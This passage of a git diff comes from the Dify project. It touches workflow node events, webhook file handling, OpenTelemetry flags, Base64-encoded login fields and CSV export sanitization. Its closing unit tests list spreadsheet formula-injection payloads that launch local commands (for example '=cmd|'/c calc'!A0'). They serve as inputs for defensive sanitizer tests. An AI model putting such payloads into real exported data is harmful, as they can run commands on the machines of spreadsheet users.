id=self._node_execution_id,
id=self.execution_id,
node_id=self.id,
node_type=self.node_type,
start_at=self._start_at,
@ -537,7 +544,7 @@ class Node(Generic[NodeDataT]):
@_dispatch.register
def _(self, event: StreamChunkEvent) -> NodeRunStreamChunkEvent:
return NodeRunStreamChunkEvent(
id=self._node_execution_id,
id=self.execution_id,
node_id=self._node_id,
node_type=self.node_type,
selector=event.selector,
@ -550,7 +557,7 @@ class Node(Generic[NodeDataT]):
match event.node_run_result.status:
case WorkflowNodeExecutionStatus.SUCCEEDED:
return NodeRunSucceededEvent(
id=self._node_execution_id,
id=self.execution_id,
node_id=self._node_id,
node_type=self.node_type,
start_at=self._start_at,
@ -558,7 +565,7 @@ class Node(Generic[NodeDataT]):
)
case WorkflowNodeExecutionStatus.FAILED:
return NodeRunFailedEvent(
id=self._node_execution_id,
id=self.execution_id,
node_id=self._node_id,
node_type=self.node_type,
start_at=self._start_at,
@ -573,7 +580,7 @@ class Node(Generic[NodeDataT]):
@_dispatch.register
def _(self, event: PauseRequestedEvent) -> NodeRunPauseRequestedEvent:
return NodeRunPauseRequestedEvent(
id=self._node_execution_id,
id=self.execution_id,
node_id=self._node_id,
node_type=self.node_type,
node_run_result=NodeRunResult(status=WorkflowNodeExecutionStatus.PAUSED),
@ -583,7 +590,7 @@ class Node(Generic[NodeDataT]):
@_dispatch.register
def _(self, event: AgentLogEvent) -> NodeRunAgentLogEvent:
return NodeRunAgentLogEvent(
id=self._node_execution_id,
id=self.execution_id,
node_id=self._node_id,
node_type=self.node_type,
message_id=event.message_id,
@ -599,7 +606,7 @@ class Node(Generic[NodeDataT]):
@_dispatch.register
def _(self, event: LoopStartedEvent) -> NodeRunLoopStartedEvent:
return NodeRunLoopStartedEvent(
id=self._node_execution_id,
id=self.execution_id,
node_id=self._node_id,
node_type=self.node_type,
node_title=self.node_data.title,
@ -612,7 +619,7 @@ class Node(Generic[NodeDataT]):
@_dispatch.register
def _(self, event: LoopNextEvent) -> NodeRunLoopNextEvent:
return NodeRunLoopNextEvent(
id=self._node_execution_id,
id=self.execution_id,
node_id=self._node_id,
node_type=self.node_type,
node_title=self.node_data.title,
@ -623,7 +630,7 @@ class Node(Generic[NodeDataT]):
@_dispatch.register
def _(self, event: LoopSucceededEvent) -> NodeRunLoopSucceededEvent:
return NodeRunLoopSucceededEvent(
id=self._node_execution_id,
id=self.execution_id,
node_id=self._node_id,
node_type=self.node_type,
node_title=self.node_data.title,
@ -637,7 +644,7 @@ class Node(Generic[NodeDataT]):
@_dispatch.register
def _(self, event: LoopFailedEvent) -> NodeRunLoopFailedEvent:
return NodeRunLoopFailedEvent(
id=self._node_execution_id,
id=self.execution_id,
node_id=self._node_id,
node_type=self.node_type,
node_title=self.node_data.title,
@ -652,7 +659,7 @@ class Node(Generic[NodeDataT]):
@_dispatch.register
def _(self, event: IterationStartedEvent) -> NodeRunIterationStartedEvent:
return NodeRunIterationStartedEvent(
id=self._node_execution_id,
id=self.execution_id,
node_id=self._node_id,
node_type=self.node_type,
node_title=self.node_data.title,
@ -665,7 +672,7 @@ class Node(Generic[NodeDataT]):
@_dispatch.register
def _(self, event: IterationNextEvent) -> NodeRunIterationNextEvent:
return NodeRunIterationNextEvent(
id=self._node_execution_id,
id=self.execution_id,
node_id=self._node_id,
node_type=self.node_type,
node_title=self.node_data.title,
@ -676,7 +683,7 @@ class Node(Generic[NodeDataT]):
@_dispatch.register
def _(self, event: IterationSucceededEvent) -> NodeRunIterationSucceededEvent:
return NodeRunIterationSucceededEvent(
id=self._node_execution_id,
id=self.execution_id,
node_id=self._node_id,
node_type=self.node_type,
node_title=self.node_data.title,
@ -690,7 +697,7 @@ class Node(Generic[NodeDataT]):
@_dispatch.register
def _(self, event: IterationFailedEvent) -> NodeRunIterationFailedEvent:
return NodeRunIterationFailedEvent(
id=self._node_execution_id,
id=self.execution_id,
node_id=self._node_id,
node_type=self.node_type,
node_title=self.node_data.title,
@ -705,7 +712,7 @@ class Node(Generic[NodeDataT]):
@_dispatch.register
def _(self, event: RunRetrieverResourceEvent) -> NodeRunRetrieverResourceEvent:
return NodeRunRetrieverResourceEvent(
id=self._node_execution_id,
id=self.execution_id,
node_id=self._node_id,
node_type=self.node_type,
retriever_resources=event.retriever_resources,

View File

@ -1,14 +1,22 @@
import logging
from collections.abc import Mapping
from typing import Any
from core.file import FileTransferMethod
from core.variables.types import SegmentType
from core.variables.variables import FileVariable
from core.workflow.constants import SYSTEM_VARIABLE_NODE_ID
from core.workflow.entities.workflow_node_execution import WorkflowNodeExecutionStatus
from core.workflow.enums import NodeExecutionType, NodeType
from core.workflow.node_events import NodeRunResult
from core.workflow.nodes.base.node import Node
from factories import file_factory
from factories.variable_factory import build_segment_with_type
from .entities import ContentType, WebhookData
logger = logging.getLogger(__name__)
class TriggerWebhookNode(Node[WebhookData]):
node_type = NodeType.TRIGGER_WEBHOOK
@ -60,6 +68,34 @@ class TriggerWebhookNode(Node[WebhookData]):
outputs=outputs,
)
def generate_file_var(self, param_name: str, file: dict):
related_id = file.get("related_id")
transfer_method_value = file.get("transfer_method")
if transfer_method_value:
transfer_method = FileTransferMethod.value_of(transfer_method_value)
match transfer_method:
case FileTransferMethod.LOCAL_FILE | FileTransferMethod.REMOTE_URL:
file["upload_file_id"] = related_id
case FileTransferMethod.TOOL_FILE:
file["tool_file_id"] = related_id
case FileTransferMethod.DATASOURCE_FILE:
file["datasource_file_id"] = related_id
try:
file_obj = file_factory.build_from_mapping(
mapping=file,
tenant_id=self.tenant_id,
)
file_segment = build_segment_with_type(SegmentType.FILE, file_obj)
return FileVariable(name=param_name, value=file_segment.value, selector=[self.id, param_name])
except ValueError:
logger.error(
"Failed to build FileVariable for webhook file parameter %s",
param_name,
exc_info=True,
)
return None
def _extract_configured_outputs(self, webhook_inputs: dict[str, Any]) -> dict[str, Any]:
"""Extract outputs based on node configuration from webhook inputs."""
outputs = {}
@ -107,18 +143,33 @@ class TriggerWebhookNode(Node[WebhookData]):
outputs[param_name] = str(webhook_data.get("body", {}).get("raw", ""))
continue
elif self.node_data.content_type == ContentType.BINARY:
outputs[param_name] = webhook_data.get("body", {}).get("raw", b"")
raw_data: dict = webhook_data.get("body", {}).get("raw", {})
file_var = self.generate_file_var(param_name, raw_data)
if file_var:
outputs[param_name] = file_var
else:
outputs[param_name] = raw_data
continue
if param_type == "file":
# Get File object (already processed by webhook controller)
file_obj = webhook_data.get("files", {}).get(param_name)
outputs[param_name] = file_obj
files = webhook_data.get("files", {})
if files and isinstance(files, dict):
file = files.get(param_name)
if file and isinstance(file, dict):
file_var = self.generate_file_var(param_name, file)
if file_var:
outputs[param_name] = file_var
else:
outputs[param_name] = files
else:
outputs[param_name] = files
else:
outputs[param_name] = files
else:
# Get regular body parameter
outputs[param_name] = webhook_data.get("body", {}).get(param_name)
# Include raw webhook data for debugging/advanced use
outputs["_webhook_raw"] = webhook_data
return outputs

View File

@ -14,7 +14,7 @@ from core.workflow.errors import WorkflowNodeRunFailedError
from core.workflow.graph import Graph
from core.workflow.graph_engine import GraphEngine
from core.workflow.graph_engine.command_channels import InMemoryChannel
from core.workflow.graph_engine.layers import DebugLoggingLayer, ExecutionLimitsLayer
from core.workflow.graph_engine.layers import DebugLoggingLayer, ExecutionLimitsLayer, ObservabilityLayer
from core.workflow.graph_engine.protocols.command_channel import CommandChannel
from core.workflow.graph_events import GraphEngineEvent, GraphNodeEventBase, GraphRunFailedEvent
from core.workflow.nodes import NodeType
@ -23,6 +23,7 @@ from core.workflow.nodes.node_mapping import NODE_TYPE_CLASSES_MAPPING
from core.workflow.runtime import GraphRuntimeState, VariablePool
from core.workflow.system_variable import SystemVariable
from core.workflow.variable_loader import DUMMY_VARIABLE_LOADER, VariableLoader, load_into_variable_pool
from extensions.otel.runtime import is_instrument_flag_enabled
from factories import file_factory
from models.enums import UserFrom
from models.workflow import Workflow
@ -98,6 +99,10 @@ class WorkflowEntry:
)
self.graph_engine.layer(limits_layer)
# Add observability layer when OTel is enabled
if dify_config.ENABLE_OTEL or is_instrument_flag_enabled():
self.graph_engine.layer(ObservabilityLayer())
def run(self) -> Generator[GraphEngineEvent, None, None]:
graph_engine = self.graph_engine

View File

@ -22,8 +22,8 @@ login_manager = flask_login.LoginManager()
@login_manager.request_loader
def load_user_from_request(request_from_flask_login):
"""Load user based on the request."""
# Skip authentication for documentation endpoints (only when Swagger is enabled)
if dify_config.swagger_ui_enabled and request.path.endswith((dify_config.SWAGGER_UI_PATH, "/swagger.json")):
# Skip authentication for documentation endpoints
if dify_config.SWAGGER_UI_ENABLED and request.path.endswith((dify_config.SWAGGER_UI_PATH, "/swagger.json")):
return None
auth_token = extract_access_token(request)

View File

@ -1,5 +1,4 @@
import functools
import os
from collections.abc import Callable
from typing import Any, TypeVar, cast
@ -7,22 +6,13 @@ from opentelemetry.trace import get_tracer
from configs import dify_config
from extensions.otel.decorators.handler import SpanHandler
from extensions.otel.runtime import is_instrument_flag_enabled
T = TypeVar("T", bound=Callable[..., Any])
_HANDLER_INSTANCES: dict[type[SpanHandler], SpanHandler] = {SpanHandler: SpanHandler()}
def _is_instrument_flag_enabled() -> bool:
"""
Check if external instrumentation is enabled via environment variable.
Third-party non-invasive instrumentation agents set this flag to coordinate
with Dify's manual OpenTelemetry instrumentation.
"""
return os.getenv("ENABLE_OTEL_FOR_INSTRUMENT", "").strip().lower() == "true"
def _get_handler_instance(handler_class: type[SpanHandler]) -> SpanHandler:
"""Get or create a singleton instance of the handler class."""
if handler_class not in _HANDLER_INSTANCES:
@ -43,7 +33,7 @@ def trace_span(handler_class: type[SpanHandler] | None = None) -> Callable[[T],
def decorator(func: T) -> T:
@functools.wraps(func)
def wrapper(*args: Any, **kwargs: Any) -> Any:
if not (dify_config.ENABLE_OTEL or _is_instrument_flag_enabled()):
if not (dify_config.ENABLE_OTEL or is_instrument_flag_enabled()):
return func(*args, **kwargs)
handler = _get_handler_instance(handler_class or SpanHandler)

View File

@ -1,4 +1,5 @@
import logging
import os
import sys
from typing import Union
@ -71,3 +72,13 @@ def init_celery_worker(*args, **kwargs):
if dify_config.DEBUG:
logger.info("Initializing OpenTelemetry for Celery worker")
CeleryInstrumentor(tracer_provider=tracer_provider, meter_provider=metric_provider).instrument()
def is_instrument_flag_enabled() -> bool:
"""
Check if external instrumentation is enabled via environment variable.
Third-party non-invasive instrumentation agents set this flag to coordinate
with Dify's manual OpenTelemetry instrumentation.
"""
return os.getenv("ENABLE_OTEL_FOR_INSTRUMENT", "").strip().lower() == "true"

View File

@ -1,3 +1,4 @@
import logging
import mimetypes
import os
import re
@ -17,6 +18,8 @@ from core.helper import ssrf_proxy
from extensions.ext_database import db
from models import MessageFile, ToolFile, UploadFile
logger = logging.getLogger(__name__)
def build_from_message_files(
*,
@ -356,15 +359,20 @@ def _build_from_tool_file(
transfer_method: FileTransferMethod,
strict_type_validation: bool = False,
) -> File:
# Backward/interop compatibility: allow tool_file_id to come from related_id or URL
tool_file_id = mapping.get("tool_file_id")
if not tool_file_id:
raise ValueError(f"ToolFile {tool_file_id} not found")
tool_file = db.session.scalar(
select(ToolFile).where(
ToolFile.id == mapping.get("tool_file_id"),
ToolFile.id == tool_file_id,
ToolFile.tenant_id == tenant_id,
)
)
if tool_file is None:
raise ValueError(f"ToolFile {mapping.get('tool_file_id')} not found")
raise ValueError(f"ToolFile {tool_file_id} not found")
extension = "." + tool_file.file_key.split(".")[-1] if "." in tool_file.file_key else ".bin"
@ -402,10 +410,13 @@ def _build_from_datasource_file(
transfer_method: FileTransferMethod,
strict_type_validation: bool = False,
) -> File:
datasource_file_id = mapping.get("datasource_file_id")
if not datasource_file_id:
raise ValueError(f"DatasourceFile {datasource_file_id} not found")
datasource_file = (
db.session.query(UploadFile)
.where(
UploadFile.id == mapping.get("datasource_file_id"),
UploadFile.id == datasource_file_id,
UploadFile.tenant_id == tenant_id,
)
.first()

66
api/libs/encryption.py Normal file
View File

@ -0,0 +1,66 @@
"""
Field Encoding/Decoding Utilities
Provides Base64 decoding for sensitive fields (password, verification code)
received from the frontend.
Note: This uses Base64 encoding for obfuscation, not cryptographic encryption.
Real security relies on HTTPS for transport layer encryption.
"""
import base64
import logging
logger = logging.getLogger(__name__)
class FieldEncryption:
"""Handle decoding of sensitive fields during transmission"""
@classmethod
def decrypt_field(cls, encoded_text: str) -> str | None:
"""
Decode Base64 encoded field from frontend.
Args:
encoded_text: Base64 encoded text from frontend
Returns:
Decoded plaintext, or None if decoding fails
"""
try:
# Decode base64
decoded_bytes = base64.b64decode(encoded_text)
decoded_text = decoded_bytes.decode("utf-8")
logger.debug("Field decoding successful")
return decoded_text
except Exception:
# Decoding failed - return None to trigger error in caller
return None
@classmethod
def decrypt_password(cls, encrypted_password: str) -> str | None:
"""
Decrypt password field
Args:
encrypted_password: Encrypted password from frontend
Returns:
Decrypted password or None if decryption fails
"""
return cls.decrypt_field(encrypted_password)
@classmethod
def decrypt_verification_code(cls, encrypted_code: str) -> str | None:
"""
Decrypt verification code field
Args:
encrypted_code: Encrypted code from frontend
Returns:
Decrypted code or None if decryption fails
"""
return cls.decrypt_field(encrypted_code)

View File

@ -131,28 +131,12 @@ class ExternalApi(Api):
}
def __init__(self, app: Blueprint | Flask, *args, **kwargs):
import logging
import os
kwargs.setdefault("authorizations", self._authorizations)
kwargs.setdefault("security", "Bearer")
# Security: Use computed swagger_ui_enabled which respects DEPLOY_ENV
swagger_enabled = dify_config.swagger_ui_enabled
kwargs["add_specs"] = swagger_enabled
kwargs["doc"] = dify_config.SWAGGER_UI_PATH if swagger_enabled else False
kwargs["add_specs"] = dify_config.SWAGGER_UI_ENABLED
kwargs["doc"] = dify_config.SWAGGER_UI_PATH if dify_config.SWAGGER_UI_ENABLED else False
# manual separate call on construction and init_app to ensure configs in kwargs effective
super().__init__(app=None, *args, **kwargs)
self.init_app(app, **kwargs)
register_external_error_handlers(self)
# Security: Log warning when Swagger is enabled in production environment
deploy_env = os.environ.get("DEPLOY_ENV", "PRODUCTION")
if swagger_enabled and deploy_env.upper() == "PRODUCTION":
logger = logging.getLogger(__name__)
logger.warning(
"SECURITY WARNING: Swagger UI is ENABLED in PRODUCTION environment. "
"This may expose sensitive API documentation. "
"Set SWAGGER_UI_ENABLED=false or remove the explicit setting to disable."
)

View File

@ -184,7 +184,7 @@ def timezone(timezone_string):
def convert_datetime_to_date(field, target_timezone: str = ":tz"):
if dify_config.DB_TYPE == "postgresql":
return f"DATE(DATE_TRUNC('day', {field} AT TIME ZONE 'UTC' AT TIME ZONE {target_timezone}))"
elif dify_config.DB_TYPE == "mysql":
elif dify_config.DB_TYPE in ["mysql", "oceanbase", "seekdb"]:
return f"DATE(CONVERT_TZ({field}, 'UTC', {target_timezone}))"
else:
raise NotImplementedError(f"Unsupported database type: {dify_config.DB_TYPE}")

View File

@ -8,6 +8,7 @@ from sqlalchemy import or_, select
from werkzeug.datastructures import FileStorage
from werkzeug.exceptions import NotFound
from core.helper.csv_sanitizer import CSVSanitizer
from extensions.ext_database import db
from extensions.ext_redis import redis_client
from libs.datetime_utils import naive_utc_now
@ -158,6 +159,12 @@ class AppAnnotationService:
@classmethod
def export_annotation_list_by_app_id(cls, app_id: str):
"""
Export all annotations for an app with CSV injection protection.
Sanitizes question and content fields to prevent formula injection attacks
when exported to CSV format.
"""
# get app info
_, current_tenant_id = current_account_with_tenant()
app = (
@ -174,6 +181,16 @@ class AppAnnotationService:
.order_by(MessageAnnotation.created_at.desc())
.all()
)
# Sanitize CSV-injectable fields to prevent formula injection
for annotation in annotations:
# Sanitize question field if present
if annotation.question:
annotation.question = CSVSanitizer.sanitize_value(annotation.question)
# Sanitize content field (answer)
if annotation.content:
annotation.content = CSVSanitizer.sanitize_value(annotation.content)
return annotations
@classmethod

View File

@ -1419,7 +1419,7 @@ class DocumentService:
document.name = name
db.session.add(document)
if document.data_source_info_dict:
if document.data_source_info_dict and "upload_file_id" in document.data_source_info_dict:
db.session.query(UploadFile).where(
UploadFile.id == document.data_source_info_dict["upload_file_id"]
).update({UploadFile.name: name})

View File

@ -33,6 +33,11 @@ from services.errors.app import QuotaExceededError
from services.trigger.app_trigger_service import AppTriggerService
from services.workflow.entities import WebhookTriggerData
try:
import magic
except ImportError:
magic = None # type: ignore[assignment]
logger = logging.getLogger(__name__)
@ -317,7 +322,8 @@ class WebhookService:
try:
file_content = request.get_data()
if file_content:
file_obj = cls._create_file_from_binary(file_content, "application/octet-stream", webhook_trigger)
mimetype = cls._detect_binary_mimetype(file_content)
file_obj = cls._create_file_from_binary(file_content, mimetype, webhook_trigger)
return {"raw": file_obj.to_dict()}, {}
else:
return {"raw": None}, {}
@ -341,6 +347,18 @@ class WebhookService:
body = {"raw": ""}
return body, {}
@staticmethod
def _detect_binary_mimetype(file_content: bytes) -> str:
"""Guess MIME type for binary payloads using python-magic when available."""
if magic is not None:
try:
detected = magic.from_buffer(file_content[:1024], mime=True)
if detected:
return detected
except Exception:
logger.debug("python-magic detection failed for octet-stream payload")
return "application/octet-stream"
@classmethod
def _process_file_uploads(
cls, files: Mapping[str, FileStorage], webhook_trigger: WorkflowWebhookTrigger

View File

@ -410,9 +410,12 @@ class VariableTruncator(BaseTruncator):
@overload
def _truncate_json_primitives(self, val: None, target_size: int) -> _PartResult[None]: ...
@overload
def _truncate_json_primitives(self, val: File, target_size: int) -> _PartResult[File]: ...
def _truncate_json_primitives(
self,
val: UpdatedVariable | str | list[object] | dict[str, object] | bool | int | float | None,
val: UpdatedVariable | File | str | list[object] | dict[str, object] | bool | int | float | None,
target_size: int,
) -> _PartResult[Any]:
"""Truncate a value within an object to fit within budget."""
@ -425,6 +428,9 @@ class VariableTruncator(BaseTruncator):
return self._truncate_array(val, target_size)
elif isinstance(val, dict):
return self._truncate_object(val, target_size)
elif isinstance(val, File):
# File objects should not be truncated, return as-is
return _PartResult(val, self.calculate_json_size(val), False)
elif val is None or isinstance(val, (bool, int, float)):
return _PartResult(val, self.calculate_json_size(val), False)
else:

View File

@ -113,16 +113,31 @@ class TestShardedRedisBroadcastChannelIntegration:
topic = broadcast_channel.topic(topic_name)
producer = topic.as_producer()
subscriptions = [topic.subscribe() for _ in range(subscriber_count)]
ready_events = [threading.Event() for _ in range(subscriber_count)]
def producer_thread():
time.sleep(0.2) # Allow all subscribers to connect
deadline = time.time() + 5.0
for ev in ready_events:
remaining = deadline - time.time()
if remaining <= 0:
break
if not ev.wait(timeout=max(0.0, remaining)):
pytest.fail("subscriber did not become ready before publish deadline")
producer.publish(message)
time.sleep(0.2)
for sub in subscriptions:
sub.close()
def consumer_thread(subscription: Subscription) -> list[bytes]:
def consumer_thread(subscription: Subscription, ready_event: threading.Event) -> list[bytes]:
received_msgs = []
# Prime subscription so the underlying Pub/Sub listener thread starts before publishing
try:
_ = subscription.receive(0.01)
except SubscriptionClosedError:
return received_msgs
finally:
ready_event.set()
while True:
try:
msg = subscription.receive(0.1)
@ -137,7 +152,10 @@ class TestShardedRedisBroadcastChannelIntegration:
with ThreadPoolExecutor(max_workers=subscriber_count + 1) as executor:
producer_future = executor.submit(producer_thread)
consumer_futures = [executor.submit(consumer_thread, subscription) for subscription in subscriptions]
consumer_futures = [
executor.submit(consumer_thread, subscription, ready_events[idx])
for idx, subscription in enumerate(subscriptions)
]
producer_future.result(timeout=10.0)
msgs_by_consumers = []

View File

@ -233,7 +233,7 @@ class TestWebhookService:
"/webhook",
method="POST",
headers={"Content-Type": "multipart/form-data"},
data={"message": "test", "upload": file_storage},
data={"message": "test", "file": file_storage},
):
webhook_trigger = MagicMock()
webhook_trigger.tenant_id = "test_tenant"
@ -242,7 +242,7 @@ class TestWebhookService:
assert webhook_data["method"] == "POST"
assert webhook_data["body"]["message"] == "test"
assert "upload" in webhook_data["files"]
assert "file" in webhook_data["files"]
# Verify file processing was called
mock_external_dependencies["tool_file_manager"].assert_called_once()
@ -414,7 +414,7 @@ class TestWebhookService:
"data": {
"method": "post",
"content_type": "multipart/form-data",
"body": [{"name": "upload", "type": "file", "required": True}],
"body": [{"name": "file", "type": "file", "required": True}],
}
}

View File

@ -9,6 +9,7 @@ import io
from unittest.mock import MagicMock, patch
import pytest
from pandas.errors import ParserError
from werkzeug.datastructures import FileStorage
from configs import dify_config
@ -250,20 +251,22 @@ class TestAnnotationImportServiceValidation:
"""Test that invalid CSV format is handled gracefully."""
from services.annotation_service import AppAnnotationService
# Create invalid CSV content
# Any content is fine once we force ParserError
csv_content = 'invalid,csv,format\nwith,unbalanced,quotes,and"stuff'
file = FileStorage(stream=io.BytesIO(csv_content.encode()), filename="test.csv", content_type="text/csv")
mock_db_session.query.return_value.where.return_value.first.return_value = mock_app
with patch("services.annotation_service.current_account_with_tenant") as mock_auth:
with (
patch("services.annotation_service.current_account_with_tenant") as mock_auth,
patch("services.annotation_service.pd.read_csv", side_effect=ParserError("malformed CSV")),
):
mock_auth.return_value = (MagicMock(id="user_id"), "tenant_id")
result = AppAnnotationService.batch_import_app_annotations("app_id", file)
# Should return error message
assert "error_msg" in result
assert "malformed" in result["error_msg"].lower()
def test_valid_import_succeeds(self, mock_app, mock_db_session):
"""Test that valid import request succeeds."""

View File

@ -1,5 +1,6 @@
"""Test authentication security to prevent user enumeration."""
import base64
from unittest.mock import MagicMock, patch
import pytest
@ -11,6 +12,11 @@ from controllers.console.auth.error import AuthenticationFailedError
from controllers.console.auth.login import LoginApi
def encode_password(password: str) -> str:
"""Helper to encode password as Base64 for testing."""
return base64.b64encode(password.encode("utf-8")).decode()
class TestAuthenticationSecurity:
"""Test authentication endpoints for security against user enumeration."""
@ -42,7 +48,9 @@ class TestAuthenticationSecurity:
# Act
with self.app.test_request_context(
"/login", method="POST", json={"email": "nonexistent@example.com", "password": "WrongPass123!"}
"/login",
method="POST",
json={"email": "nonexistent@example.com", "password": encode_password("WrongPass123!")},
):
login_api = LoginApi()
@ -72,7 +80,9 @@ class TestAuthenticationSecurity:
# Act
with self.app.test_request_context(
"/login", method="POST", json={"email": "existing@example.com", "password": "WrongPass123!"}
"/login",
method="POST",
json={"email": "existing@example.com", "password": encode_password("WrongPass123!")},
):
login_api = LoginApi()
@ -104,7 +114,9 @@ class TestAuthenticationSecurity:
# Act
with self.app.test_request_context(
"/login", method="POST", json={"email": "nonexistent@example.com", "password": "WrongPass123!"}
"/login",
method="POST",
json={"email": "nonexistent@example.com", "password": encode_password("WrongPass123!")},
):
login_api = LoginApi()

View File

@ -8,6 +8,7 @@ This module tests the email code login mechanism including:
- Workspace creation for new users
"""
import base64
from unittest.mock import MagicMock, patch
import pytest
@ -25,6 +26,11 @@ from controllers.console.error import (
from services.errors.account import AccountRegisterError
def encode_code(code: str) -> str:
"""Helper to encode verification code as Base64 for testing."""
return base64.b64encode(code.encode("utf-8")).decode()
class TestEmailCodeLoginSendEmailApi:
"""Test cases for sending email verification codes."""
@ -290,7 +296,7 @@ class TestEmailCodeLoginApi:
with app.test_request_context(
"/email-code-login/validity",
method="POST",
json={"email": "test@example.com", "code": "123456", "token": "valid_token"},
json={"email": "test@example.com", "code": encode_code("123456"), "token": "valid_token"},
):
api = EmailCodeLoginApi()
response = api.post()
@ -339,7 +345,12 @@ class TestEmailCodeLoginApi:
with app.test_request_context(
"/email-code-login/validity",
method="POST",
json={"email": "newuser@example.com", "code": "123456", "token": "valid_token", "language": "en-US"},
json={
"email": "newuser@example.com",
"code": encode_code("123456"),
"token": "valid_token",
"language": "en-US",
},
):
api = EmailCodeLoginApi()
response = api.post()
@ -365,7 +376,7 @@ class TestEmailCodeLoginApi:
with app.test_request_context(
"/email-code-login/validity",
method="POST",
json={"email": "test@example.com", "code": "123456", "token": "invalid_token"},
json={"email": "test@example.com", "code": encode_code("123456"), "token": "invalid_token"},
):
api = EmailCodeLoginApi()
with pytest.raises(InvalidTokenError):
@ -388,7 +399,7 @@ class TestEmailCodeLoginApi:
with app.test_request_context(
"/email-code-login/validity",
method="POST",
json={"email": "different@example.com", "code": "123456", "token": "token"},
json={"email": "different@example.com", "code": encode_code("123456"), "token": "token"},
):
api = EmailCodeLoginApi()
with pytest.raises(InvalidEmailError):
@ -411,7 +422,7 @@ class TestEmailCodeLoginApi:
with app.test_request_context(
"/email-code-login/validity",
method="POST",
json={"email": "test@example.com", "code": "wrong_code", "token": "token"},
json={"email": "test@example.com", "code": encode_code("wrong_code"), "token": "token"},
):
api = EmailCodeLoginApi()
with pytest.raises(EmailCodeError):
@ -497,7 +508,7 @@ class TestEmailCodeLoginApi:
with app.test_request_context(
"/email-code-login/validity",
method="POST",
json={"email": "test@example.com", "code": "123456", "token": "token"},
json={"email": "test@example.com", "code": encode_code("123456"), "token": "token"},
):
api = EmailCodeLoginApi()
with pytest.raises(WorkspacesLimitExceeded):
@ -539,7 +550,7 @@ class TestEmailCodeLoginApi:
with app.test_request_context(
"/email-code-login/validity",
method="POST",
json={"email": "test@example.com", "code": "123456", "token": "token"},
json={"email": "test@example.com", "code": encode_code("123456"), "token": "token"},
):
api = EmailCodeLoginApi()
with pytest.raises(NotAllowedCreateWorkspace):

View File

@ -8,6 +8,7 @@ This module tests the core authentication endpoints including:
- Account status validation
"""
import base64
from unittest.mock import MagicMock, patch
import pytest
@ -28,6 +29,11 @@ from controllers.console.error import (
from services.errors.account import AccountLoginError, AccountPasswordError
def encode_password(password: str) -> str:
"""Helper to encode password as Base64 for testing."""
return base64.b64encode(password.encode("utf-8")).decode()
class TestLoginApi:
"""Test cases for the LoginApi endpoint."""
@ -106,7 +112,9 @@ class TestLoginApi:
# Act
with app.test_request_context(
"/login", method="POST", json={"email": "test@example.com", "password": "ValidPass123!"}
"/login",
method="POST",
json={"email": "test@example.com", "password": encode_password("ValidPass123!")},
):
login_api = LoginApi()
response = login_api.post()
@ -158,7 +166,11 @@ class TestLoginApi:
with app.test_request_context(
"/login",
method="POST",
json={"email": "test@example.com", "password": "ValidPass123!", "invite_token": "valid_token"},
json={
"email": "test@example.com",
"password": encode_password("ValidPass123!"),
"invite_token": "valid_token",
},
):
login_api = LoginApi()
response = login_api.post()
@ -186,7 +198,7 @@ class TestLoginApi:
# Act & Assert
with app.test_request_context(
"/login", method="POST", json={"email": "test@example.com", "password": "password"}
"/login", method="POST", json={"email": "test@example.com", "password": encode_password("password")}
):
login_api = LoginApi()
with pytest.raises(EmailPasswordLoginLimitError):
@ -209,7 +221,7 @@ class TestLoginApi:
# Act & Assert
with app.test_request_context(
"/login", method="POST", json={"email": "frozen@example.com", "password": "password"}
"/login", method="POST", json={"email": "frozen@example.com", "password": encode_password("password")}
):
login_api = LoginApi()
with pytest.raises(AccountInFreezeError):
@ -246,7 +258,7 @@ class TestLoginApi:
# Act & Assert
with app.test_request_context(
"/login", method="POST", json={"email": "test@example.com", "password": "WrongPass123!"}
"/login", method="POST", json={"email": "test@example.com", "password": encode_password("WrongPass123!")}
):
login_api = LoginApi()
with pytest.raises(AuthenticationFailedError):
@ -277,7 +289,7 @@ class TestLoginApi:
# Act & Assert
with app.test_request_context(
"/login", method="POST", json={"email": "banned@example.com", "password": "ValidPass123!"}
"/login", method="POST", json={"email": "banned@example.com", "password": encode_password("ValidPass123!")}
):
login_api = LoginApi()
with pytest.raises(AccountBannedError):
@ -322,7 +334,7 @@ class TestLoginApi:
# Act & Assert
with app.test_request_context(
"/login", method="POST", json={"email": "test@example.com", "password": "ValidPass123!"}
"/login", method="POST", json={"email": "test@example.com", "password": encode_password("ValidPass123!")}
):
login_api = LoginApi()
with pytest.raises(WorkspacesLimitExceeded):
@ -349,7 +361,11 @@ class TestLoginApi:
with app.test_request_context(
"/login",
method="POST",
json={"email": "different@example.com", "password": "ValidPass123!", "invite_token": "token"},
json={
"email": "different@example.com",
"password": encode_password("ValidPass123!"),
"invite_token": "token",
},
):
login_api = LoginApi()
with pytest.raises(InvalidEmailError):

View File

@ -0,0 +1,151 @@
"""Unit tests for CSV sanitizer."""
from core.helper.csv_sanitizer import CSVSanitizer
class TestCSVSanitizer:
"""Test cases for CSV sanitization to prevent formula injection attacks."""
def test_sanitize_formula_equals(self):
"""Test sanitizing values starting with = (most common formula injection)."""
assert CSVSanitizer.sanitize_value("=cmd|'/c calc'!A0") == "'=cmd|'/c calc'!A0"
assert CSVSanitizer.sanitize_value("=SUM(A1:A10)") == "'=SUM(A1:A10)"
assert CSVSanitizer.sanitize_value("=1+1") == "'=1+1"
assert CSVSanitizer.sanitize_value("=@SUM(1+1)") == "'=@SUM(1+1)"
def test_sanitize_formula_plus(self):
"""Test sanitizing values starting with + (plus formula injection)."""
assert CSVSanitizer.sanitize_value("+1+1+cmd|'/c calc") == "'+1+1+cmd|'/c calc"
assert CSVSanitizer.sanitize_value("+123") == "'+123"
assert CSVSanitizer.sanitize_value("+cmd|'/c calc'!A0") == "'+cmd|'/c calc'!A0"
def test_sanitize_formula_minus(self):
"""Test sanitizing values starting with - (minus formula injection)."""
assert CSVSanitizer.sanitize_value("-2+3+cmd|'/c calc") == "'-2+3+cmd|'/c calc"
assert CSVSanitizer.sanitize_value("-456") == "'-456"
assert CSVSanitizer.sanitize_value("-cmd|'/c notepad") == "'-cmd|'/c notepad"
def test_sanitize_formula_at(self):
"""Test sanitizing values starting with @ (at-sign formula injection)."""
assert CSVSanitizer.sanitize_value("@SUM(1+1)*cmd|'/c calc") == "'@SUM(1+1)*cmd|'/c calc"
assert CSVSanitizer.sanitize_value("@AVERAGE(1,2,3)") == "'@AVERAGE(1,2,3)"
def test_sanitize_formula_tab(self):
"""Test sanitizing values starting with tab character."""
assert CSVSanitizer.sanitize_value("\t=1+1") == "'\t=1+1"
assert CSVSanitizer.sanitize_value("\tcalc") == "'\tcalc"
def test_sanitize_formula_carriage_return(self):
"""Test sanitizing values starting with carriage return."""
